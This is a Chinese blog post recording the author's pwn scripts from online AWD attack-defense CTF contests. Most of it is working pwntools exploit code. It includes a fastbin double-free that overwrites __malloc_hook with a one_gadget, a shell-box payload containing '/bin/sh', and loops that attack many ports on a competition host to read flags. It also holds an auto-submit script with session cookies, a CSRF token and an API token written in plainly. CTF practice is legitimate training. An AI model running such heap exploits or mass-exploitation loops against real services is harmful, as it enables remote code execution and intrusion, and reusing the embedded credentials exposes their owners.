awd 通打pwn脚本记录一波

发表于 | 分类于 |

0x0 前言

第一次线上awd,交flag是交的真的爽,也算是对awd的流程有所熟悉了。题目不难,但是深感自己写脚本速度还是不够快。

0x1 第一题

double_free,然后改就是把free函数给弄没了。。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
import os
from pwn import *

def add(index,size,content):
    sh.sendline('1')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    sh.recvuntil('size>> ')
    sh.sendline(str(size))
    sh.recvuntil('name>> ')
    sh.sendline(content)
    sh.recvuntil('Your Choice\n')
def delete(index):
    sh.sendline('2')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    sh.recvuntil('Your Choice\n')
    
def edit(index,content):
    sh.sendline('3')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    sh.recvuntil('name>> ')
    sh.sendline(content)
    
def show(index):
    sh.sendline('5')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    content = sh.recv(6)
   # log.info(content)
    sh.recvuntil('Your Choice\n')
    return content

ip = "39.100.119.37"

def get_shell(ip, port):
	sh = remote(ip, port)
	sh.recvuntil('Your Choice\n')
	add(0,0x100,'a') #0
	add(1,0x60,'b') #1
	add(9,0x30,'ss')
	delete(0)
	libc_base = u64(show(0).ljust(8,'\x00')) - 0x3c4b78
	log.success('libc_base = ' + hex(libc_base))
	one_gadget = libc_base + 0xf02a4
	malloc_hook = libc_base + 0x3c4b10
	fake_fast = malloc_hook - 0x13
	add(2,0x60,'c')
	add(3,0x60,'3')

	delete(1)
	delete(2)
	delete(1)
	delete(9)
	add(4,0x60,p64(fake_fast))
	add(5,0x60,'z')
	add(6,0x60,'ss')
	add(7,0x60,'a' * 0x3 + p64(one_gadget))

	sh.sendline('2')
	sh.recvuntil('index>> ')
	sh.sendline(str(1))
	
	return sh

def get_flag(ip, port):
	try:
		r = get_shell(ip, port)
		r.sendline("cat flag\n")
		print r.recv(100)
		r.close()
	except KeyError as e:
		print('KeyError')
	except IndexError as e:
		print('IndexError')
	except TypeError as e:
		print('TypeError')
	except ValueError as e:
		print('ValueError')
	except Exception as e:
		print('Exception')

port = 41080

for i in range(20):
	get_flag(ip, port + i * 100)

0x2 第二题

还是个double_free,同样把free给改没了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
import os
from pwn import *

token = "7hQvn3AnHrtjaFmFN2MxztbCM4hGRQECZKEvJzu2dtSfU"
url = "http://10.66.20.15/api/v1/jad/web/submit_flag/?event_id=2"

ips=[]

context.timeout = 1

def add(index,size,content):
    sh.sendline('1')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    sh.recvuntil('size>> ')
    sh.sendline(str(size))
    sh.recvuntil('name>> ')
    sh.sendline(content)
    sh.recvuntil('Your Choice\n')
def delete(index):
    sh.sendline('2')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    sh.recvuntil('Your Choice\n')
    
def edit(index,content):
    sh.sendline('3')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    sh.recvuntil('name>> ')
    sh.sendline(content)
    
def show(index):
    sh.sendline('5')
    sh.recvuntil('index>> ')
    sh.sendline(str(index))
    content = sh.recv(6)
   # log.info(content)
    sh.recvuntil('Your Choice\n')
    return content
for i in range(3,30):
	ips.append("4" + str(i + 2).rjust(2,'0') + "80")
# print ips

def get_shell(ip):
	global sh
	
	sh = remote('39.100.119.37', int(ip,10))
	sh.recvuntil('Your Choice\n')
	add(0,0x100,'a') #0
	add(1,0x60,'b') #1
	add(9,0x30,'ss')
	delete(0)
	libc_base = u64(show(0).ljust(8,'\x00')) - 0x3c4b78
	log.success('libc_base = ' + hex(libc_base))
	one_gadget = libc_base + 0xf02a4
	malloc_hook = libc_base + 0x3c4b10
	fake_fast = malloc_hook - 0x13
	add(2,0x60,'c')
	add(3,0x60,'3')

	delete(1)
	delete(2)
	delete(1)
	delete(9)
	add(4,0x60,p64(fake_fast))
	add(5,0x60,'z')
	add(6,0x60,'ss')
	add(7,0x60,'a' * 0x3 + p64(one_gadget))
	sh.sendline('2')
	sh.sendline('1')
	return sh

def get_flag(ip):
	try:
		sh = get_shell(ip)
		#sh.interactive()
		sh.sendline('cat ?l?g')
		sleep(0.5)
		sh.sendline('cat flag')
		flag = sh.recvall(timeout= 1)
		log.success(flag)
		sh.close()
	except KeyError as e:
		print('KeyError')
	except IndexError as e:
		print('IndexError')
	except TypeError as e:
		print('TypeError')
	except ValueError as e:
		print('ValueError')
	except Exception as e:
		print('Exception')


for ip in ips:
	# if ip[7:9] == "16" or ip[7:9] == "17" or ip[7:8] == "8" or ip[7:8] == "6":
	# 	continue

	get_flag(ip)

自动提交脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import requests
def tjflag1(flag):

    url="http://39.100.119.37:8080/api/v1/challenges/attempt"
    #data={"challenge_id":2,"submission":""+flag+""}
    data='{"challenge_id":2,"submission":"'+flag+'"}'
    h = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"CSRF-Token":"e9817606c5e5373499bd7e43b64c045b60a276b839b340c4f4a37c2eb27f4e8a",
"Connection": "keep-alive",
"Content-Type": "application/json"
}
    cookies={"session":"2deefa03-cda6-41fc-be25-a986067c7048","PHPSESSID":"jnr3quolg5o2ohlifbdld6bku5"}
    req=requests.post(url=url,data=data,cookies=cookies,headers=h)
    print(req.text)

def ftjflag1():
    with open("./web2.txt") as f:
        for a in f:
            print(a.strip())
            tjflag1(a.strip())
ftjflag1()

整理flag的正则

1
2
flag=re.findall(r'flag{[a-zA-Z0-9\-]*}', data)[0]
            flag_file.write(flag+"\n")

0x3 第二次awd pwn1脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
import os

from pwn import *



token = "7hQvn3AnHrtjaFmFN2MxztbCM4hGRQECZKEvJzu2dtSfU"

url = "http://10.66.20.15/api/v1/jad/web/submit_flag/?event_id=2"



ips=[]

context.timeout = 1





def add(size,content):

    sh.recvuntil("choice:")

    sh.sendline('1')

    sh.recvuntil("How long is your secret?\n")

    sh.sendline(str(size))

    sh.recvuntil("So,tell me your secret:\n")

    sh.sendline(content)



def delete(idx):

    sh.recvuntil("choice:")

    sh.sendline('2')

    sh.recvuntil('Which secret do you want to drop off?')

    sh.sendline(str(idx))



fo = open("foo.txt", "w")



for i in range(3,28):

	ips.append("1" + str(i).rjust(2,'0') + "80")

# print ips



def get_shell(ip):

	global sh

	sh = remote('39.100.119.37', int(ip,10))

	#sh = process('./pwn')

	sh.send('iwanaflag')

	print sh.recv(timeout=0.5)

	payload = '\x00' * 0x40

	sh.sendline(payload)

	#gdb.attach(sh)

	sh.recvuntil('4. exit')

	sh.sendline('4')

	sh.recvuntil('Here is shell box!\n')

	payload = 'ls\x00,/bin/sh'





	sh.send(payload)

	#sh.interactive()

	return sh



def get_flag(ip):

	try:

		sh = get_shell(ip)

		#sh.interactive()



		sh.sendline('cat flag')

		#sh.sendline('cat flag')

		#sh.interactive()

		flag = sh.recvall(timeout=0.2)

		fo.write(flag)

		sh.close()

	except KeyError as e:

		print('KeyError')

	except IndexError as e:

		print('IndexError')

	except TypeError as e:

		print('TypeError')

	except ValueError as e:

		print('ValueError')

	except Exception as e:

		print('Exception')





for ip in ips:

	# if ip[7:9] == "16" or ip[7:9] == "17" or ip[7:8] == "8" or ip[7:8] == "6":

	# 	continue

	get_flag(ip)

python经常碰到一些缩进问题的报错,很烦人

-------------本文结束感谢您的阅读-------------
+ +